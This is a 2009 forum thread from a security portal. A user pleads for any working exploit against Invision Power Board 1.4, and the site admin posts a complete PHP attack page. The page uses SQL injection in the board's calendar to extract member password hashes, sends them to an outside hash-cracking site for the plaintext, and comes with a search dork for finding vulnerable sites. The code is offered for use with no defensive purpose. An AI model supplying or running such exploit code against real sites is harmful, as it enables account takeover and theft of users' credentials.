Waraxe IT Security Portal
Login or Register
May 1, 2025
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 64
Members: 0
Total: 64
Full disclosure
Microsoft Windows .XRM-MS File / NTLM Information DisclosureSpoofing
[IWCC 2025] CfP: 14th International Workshop on Cyber Crime -Ghent, Belgium, Aug 11-14, 2025
Inedo ProGet Insecure Reflection and CSRF Vulnerabilities
Ruby on Rails Cross-Site Request Forgery
Microsoft ".library-ms" File / NTLM Information Disclosure (Resurrected 2025)
HNS-2025-10 - HN Security Advisory - Local privilege escalation in Zyxel uOS
APPLE-SA-04-16-2025-4 visionOS 2.4.1
APPLE-SA-04-16-2025-3 tvOS 18.4.1
APPLE-SA-04-16-2025-2 macOS Sequoia 15.4.1
APPLE-SA-04-16-2025-1 iOS 18.4.1 and iPadOS 18.4.1
Business Logic Flaw: Price Manipulation - AlegroCartv1.2.9
Stored XSS in "Message" Functionality - AlegroCartv1.2.9
XSS via SVG Image Upload - AlegroCartv1.2.9
BBOT 2.1.0 - Local Privilege Escalation via Malicious ModuleExecution
83 vulnerabilities in Vasion Print / PrinterLogic
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Invision Power Board -> I REALLY NEED HELP IN HACKING FORUM!!! ~*PLZ HELP*~
Post new topicReply to topic View previous topic :: View next topic
I REALLY NEED HELP IN HACKING FORUM!!! ~*PLZ HELP*~
PostPosted: Thu Mar 19, 2009 11:17 am Reply with quote
BenMix2
Advanced user
Advanced user
Joined: Jan 08, 2009
Posts: 65




I really need an Exploit for Invision Power Board 1.4, Please I really need it, very urgently.
Also, if you have any exploit that works on that system, please give it to me.

Thanks.
View user's profile Send private message
plzplzplz
PostPosted: Thu Mar 19, 2009 2:46 pm Reply with quote
BenMix2
Advanced user
Advanced user
Joined: Jan 08, 2009
Posts: 65




*up*
plz plz help!
i really need this!!!!
View user's profile Send private message
PostPosted: Thu Mar 19, 2009 3:16 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




This is something I found for IPB 1.4, maybe works, maybe not ... just try it ...

Code:

<?php
//----------------------------------------------------------------------------------------------------//
// Invision Power Board Calendar SQL Injection Exploit
// Found by WaReZ
// Dork : "Powered by Invision Power Board (U) v1.4 Final 2005 IPS"
//----------------------------------------------------------------------------------------------------//
// Coded by Pr0T3cT10n < Pr0T3cT10n@Gmail.Com >
// KamikaZ-Team
// ISRAEL
//----------------------------------------------------------------------------------------------------//
set_time_limit(0);
ignore_user_abort(0);
function pull_out_md5($site, $path, $id)
{
echo('<div align="left" class="text">Exploiting..<br />');
$contents = file_get_contents('http://www.' .$site.$path. 'index.php?act=calendar&m=3&y=2008+AND+1=0+UNION+SELECT+1,id,2008,3,1,password,password,0x2A,password,password,password,password,password,password,password,password,password,password,password,password,password+FROM+ibf_members+where+id+=+' .$id. '+UNION+SELECT+*+FROM+ibf_calendar_events+WHERE+1=1');
if(preg_match("/eventid\=1\'\>([a-z0-9]+)\</", $contents, $matches))
{
echo('Found hash(' .$matches[1]. ')!<br />Try to crack it..<br />');
$md5_search = file_get_contents('http://gdataonline.com/qkhash.php?mode=txt&hash=' .$matches[1]);
if(preg_match("/<td width=\"35%\"><b>(.*)<\/b><\/td>/", $md5_search, $results))
echo('OK, <b>Cracked</b>(<b>' .$matches[1]. ' = ' .$results[1]. '</b>)<br />');
else
{
echo('Failed.<br />');
echo('Hash: ' .$matches[1]);
}
}
echo('</div>');
}
?>
<html dir="ltr">
<head>
<title>Invision Power Board Calendar SQL Injection Exploit</title>
<style>
* { background-color: #000000; font-family: Verdana; color: #999999; }
.text { font-size: 12px; }
a:link, a:visited, a:active { color: #e3e2e2; text-decoration: none; font-size: 11px;}
a:hover { color: #1774ba; font-size: 11px; }
input, textarea, select { background-color: black; color: #a6a6a6; border: solid 1px #363636; }
input:hover, textarea:hover { border-color: #D0D0D0; }
input:focus, textarea:focus { border-color: #F0E80A; color: #FFFFFF; }
</style>
</head>
<body>
<div align="left"><h2><u>Invision Power Board Calendar SQL Injection Exploit</u></h2></div>
<?php
if($_POST['site'] && $_POST['path'] && $_POST['id'] && $_POST['submit'])
pull_out_md5($_POST['site'], $_POST['path'], $_POST['id']);
else
echo('<div align="left"><form method="POST" action="?"><table class="text"><tr><td>Site:</td><td><input type="text" name="site"></td></tr><tr><td>Path:</td><td><input type="text" name="path"></td></tr><tr><td>User ID:</td><td><input type="text" name="id"></td></tr><tr><td><input type="submit" name="submit" value="Submit"></td></tr></table></form></div>');
?>
</body>
</html>
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu Mar 19, 2009 6:13 pm Reply with quote
BenMix2
Advanced user
Advanced user
Joined: Jan 08, 2009
Posts: 65




thank you man!
View user's profile Send private message
I REALLY NEED HELP IN HACKING FORUM!!! ~*PLZ HELP*~
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.047 Seconds